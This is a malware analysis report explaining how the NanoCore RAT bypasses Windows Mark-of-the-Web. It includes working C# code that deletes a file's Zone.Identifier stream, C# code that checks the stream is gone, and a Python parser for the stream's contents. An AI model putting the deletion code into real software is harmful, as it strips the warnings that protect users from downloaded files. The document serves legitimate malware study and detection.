MalwareAnalysisSeries

This repository contains the analysis reports, technical details and any tools created to help with malware analysis. Additionally, the repo contains the extracted TTPs, with code, along with detection rules.


Project maintained by shaddy43. Hosted on GitHub Pages, theme by mattgraham.

NanoCore 1.2.2.0: MOTW Bypass

RAT Image

NanoCore has the capability to bypass Mark-of-the-Web. The "Mark of the Web" (MOTW) is a security feature in Windows that identifies files downloaded from the internet or other untrusted sources. It adds a Zone.Identifier alternate data stream (ADS) to the file, recording its origin. Windows and applications such as browsers and Office use this information to decide whether to apply additional security measures, such as opening the file in Protected View or warning the user before execution.

MOTW can easily be bypassed by deleting the Zone.Identifier stream, but remember that an ADS cannot be deleted through the normal file APIs; it needs APIs that can address an ADS by name. In the case of NanoCore 1.2.2.0, the sample imports the Win32 API DeleteFile and uses it to delete the Zone.Identifier stream of a file.

Implementation

Imports

To delete an ADS we need the Win32 API DeleteFile, so the API is imported (P/Invoked) first.

// P/Invoke declaration for kernel32!DeleteFileW; requires using System.Runtime.InteropServices
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool DeleteFile(string lpFileName);

Remove MOTW

Removing MOTW (Mark-of-the-Web) is pretty simple. The mark is stored in an ADS that is addressed by appending :Zone.Identifier to the file path. Deleting that Zone.Identifier stream removes the Mark-of-the-Web from the file.

Example: if a file is at C:\Users\Public\Test.pdf, then its Mark-of-the-Web is in the stream C:\Users\Public\Test.pdf:Zone.Identifier

// Required namespaces: System, System.Reflection, System.Runtime.InteropServices
static void Main(string[] args)
{
    // Clear the Zone.Identifier stream of the running executable
    if (clearZone(Assembly.GetExecutingAssembly().Location))
    {
        Console.WriteLine("Zone.Identifier Deleted Successfully");
    }
    else
    {
        Console.WriteLine("Failed to Delete Zone.Identifier");
    }
}

// Deletes the Zone.Identifier ADS of the given file.
// Returns false when the stream does not exist or DeleteFile fails (see Marshal.GetLastWin32Error()).
static bool clearZone(string path)
{
    return DeleteFile(path + ":Zone.Identifier");
}

Verify MOTW Bypass

Since Zone.Identifier is an ADS (Alternate Data Stream), it cannot be accessed like an ordinary file. We need Win32 APIs that can open and read a named stream, so we import them and then use them to verify whether the Zone.Identifier stream has been deleted or not.

// P/Invoke declarations; require using System.Runtime.InteropServices
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
static extern IntPtr CreateFile(
    string lpFileName,
    uint dwDesiredAccess,
    uint dwShareMode,
    IntPtr lpSecurityAttributes,
    uint dwCreationDisposition,
    uint dwFlagsAndAttributes,
    IntPtr hTemplateFile);

[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadFile(
    IntPtr hFile,
    [Out] byte[] lpBuffer,
    uint nNumberOfBytesToRead,
    out uint lpNumberOfBytesRead,
    IntPtr lpOverlapped);

[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hObject);

// Required namespaces: System, System.Reflection, System.Runtime.InteropServices, System.Text
static void Main(string[] args)
{
    // Check whether the running executable still carries a Zone.Identifier stream
    if (!HasZoneIdentifier(Assembly.GetExecutingAssembly().Location))
    {
        Console.WriteLine(":Zone.Identifier deleted");
    }
    else
    {
        Console.WriteLine("Failed to delete :Zone.Identifier");
    }
}

// Returns true if the file has a Zone.Identifier ADS, printing its content when readable.
static bool HasZoneIdentifier(string filePath)
{
    string file_zone = filePath + ":Zone.Identifier";

    // Open the ADS using CreateFile: GENERIC_READ (0x80000000), FILE_SHARE_READ (1), OPEN_EXISTING (3)
    IntPtr hFile = CreateFile(file_zone, 0x80000000, 1, IntPtr.Zero, 3, 0, IntPtr.Zero);

    // CreateFile returns INVALID_HANDLE_VALUE (-1) when the stream cannot be opened
    if (hFile.ToInt64() != -1)
    {
        // Zone.Identifier streams are small; a single 1 KiB read is enough in practice
        byte[] buffer = new byte[1024];
        uint bytesRead;
        if (ReadFile(hFile, buffer, (uint)buffer.Length, out bytesRead, IntPtr.Zero))
        {
            string content = Encoding.UTF8.GetString(buffer, 0, (int)bytesRead);
            Console.WriteLine("ADS Content: " + content);
        }
        CloseHandle(hFile);
    }
    else
    {
        Console.WriteLine("Failed to open ADS or ADS does not exist.");
        return false;
    }
    return true;
}
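The stream that the verification code above reads and prints is a short INI-style text block: a [ZoneTransfer] section with a ZoneId line and, for browser downloads, usually ReferrerUrl and HostUrl lines. As an added example, not code from this repository, here is a Python parser that interprets such content so an analyst can see which URL security zone a file was marked with; the sample stream and its example.invalid URLs are constructed.

```python
# Meaning of the ZoneId values used by Windows URL security zones (URLZONE_*).
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_identifier(content: str) -> dict:
    """Parse the text of a Zone.Identifier stream.

    Returns a dict with zone_id, zone_name, referrer and host, or {} when the
    text has no usable [ZoneTransfer] section (empty stream, foreign data,
    or a non-numeric ZoneId).
    """
    fields = {}
    in_section = False
    for raw in content.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            # Only keys under [ZoneTransfer] are part of the mark
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    try:
        zone = int(fields["ZoneId"])
    except (KeyError, ValueError):
        return {}
    return {
        "zone_id": zone,
        "zone_name": ZONE_NAMES.get(zone, "Unknown"),
        "referrer": fields.get("ReferrerUrl"),
        "host": fields.get("HostUrl"),
    }


def is_untrusted_origin(content: str) -> bool:
    """True when the mark places the file in the Internet or Restricted sites zone."""
    info = parse_zone_identifier(content)
    return bool(info) and info["zone_id"] >= 3


# Constructed sample, shaped like the stream a browser writes on download.
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example.invalid/\r\n"
                 "HostUrl=https://example.invalid/downloads/Test.pdf\r\n")
```

On Windows the same text can be read from PowerShell with Get-Content -Path <file> -Stream Zone.Identifier and passed to parse_zone_identifier; an empty result for a file that was just downloaded is the condition this report's bypass produces.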

Find the complete code here: Shaddy43/MalwareAnalysisSeries

Disclaimer

Artifacts and code in this repository are intended to be used for educational purposes only!